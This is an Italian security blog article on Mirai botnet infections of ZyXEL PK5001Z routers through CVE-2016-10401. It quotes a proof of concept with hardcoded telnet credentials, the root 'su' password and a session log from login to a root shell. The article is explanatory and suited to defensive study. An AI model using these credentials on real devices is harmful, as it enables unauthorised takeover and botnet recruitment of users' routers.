Mirai: la tempesta dei malware continua

Mirai è un malware che trasforma i sistemi che infetta in botnet controllabili da remoto e utilizzabili per attacchi informatici su larga scala; si ha evidenza di questo malware già dal 2016 quando circa 900000 router della Deustche Telekom erano stati infettati.
Nei giorni scorsi Li Fengpei, ricercatore nel campo della sicurezza informatica, aveva rilasciato un PoC (proof of concept) riguardante la vulnerabilità scoperta nel 2016 (CVE-2016-10401) su un modello di router ZyXEL, più precisamente il PK5001Z.
Nel dettaglio questo router ha una “hardcoded” password per l’ utente root al proprio interno (zyad5001), nonostante la password non possa essere utilizzata per accedere al dispositivo, ed è stato scoperto che una grandissima quantità di dispositivi ZyXEL hanno delle default telnet credentials che sono rispettivamente:

  • admin/CentryL1nk
  • admin/QwestM0dem

Questa “caratteristica” ha quindi dato il via ad un attacco su larga scala e gli attaccanti hanno sfruttato il fatto che Telefonica ISP, provider internet Argentino, fornisse questo modello di router ai propri utenti.

Il 22 Novembre, infatti, diversi analyzer hanno notato una grandissima quantità di tentativi di accesso su porte 23 e 2323 sugli IP pubblici del suddetto ISP e su altri IP, tentativi che nel 70% dei casi sono andati a buon fine, nel giro di 60 ore infatti si sono registrati circa 100.000 router infetti che scansionavo la rete in cerca di device ZyXEL.

Tutta questa attività non ha comunque dato evidenza di problematiche di lentezza o di latenza alta negli utenti con dispositivi infetti, solitamente primo indizio evidente di un infezione in corso.
Mirai è comunque un malware che non implementa un meccanismo di persistenza e quindi un semplice riavvio del dispositivo attaccato può riportare la situazione alla normalità.

Ciò che risulta difficile comprendere o quantomeno anomalo è, come mai provider di certe dimensioni non si preoccupino, in maniera quantomeno dovuta, della sicurezza delle proprie utenze.
Una vulnerabilità di inizio 2016 non è stata patchata lasciando centinaia di migliaia di dispositivi esposti ad attacchi di vecchia data e che dovrebbero essere utilizzati come case studies.
È evidente come poche semplici accortezze potrebbero aumentare esponenzialmente la sicurezza del provider e dei propri utenti.

POC

1 # Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root 
 2 Telnet Password.
 3 # Google Dork: n/a
 4 # Date: 2017-10-31
 5 # Exploit Author: Matthew Sheimo
 6 # Vendor Homepage: https://www.zyxel.com/
 7 # Software Link: n/a
 8 # Version: PK5001Z 2.6.20.19
 9 # Tested on: Linux
 10 # About: ZyXEL PK5001Z Modem is used by Century Link a global 
 11 communications and IT services company focused on connecting its 
 12 customers to the power of the digital world. 
 13 # Linked CVE's: CVE-2016-10401
 14 
 15 Hardcoded password for ZyXEL PK5001Z Modem, login with the following 
 16 credentials via Telnet
 17 
 18 username: admin
 19 password: CenturyL1nk
 20 
 21 Escalate to root with 'su' and this password.
 22 
 23 password: zyad5001
 24 
 25 [root:/]# telnet 192.168.0.1
 26 Trying 192.168.0.1...
 27 Connected to 192.168.0.1.
 28 Escape character is '^]'.
 29 
 30 PK5001Z login: admin
 31 Password: CenturyL1nk
 32 $ whoami
 33 admin_404A03Tel
 34 $ su
 35 Password: zyad5001
 36 # whoami
 37 root
 38 # uname -a
 39 Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
 40 # cat /etc/zyfwinfo

https://nvd.nist.gov/vuln/detail/CVE-2016-10401
https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-1015.html#vulnerability
https://www.exploit-db.com/exploits/43105/][/vc_column_text]

 

ICT Security

Francesco Baiocchi
VM Sistemi – ICT Security Support Specialist

 

Related Posts

Pin It on Pinterest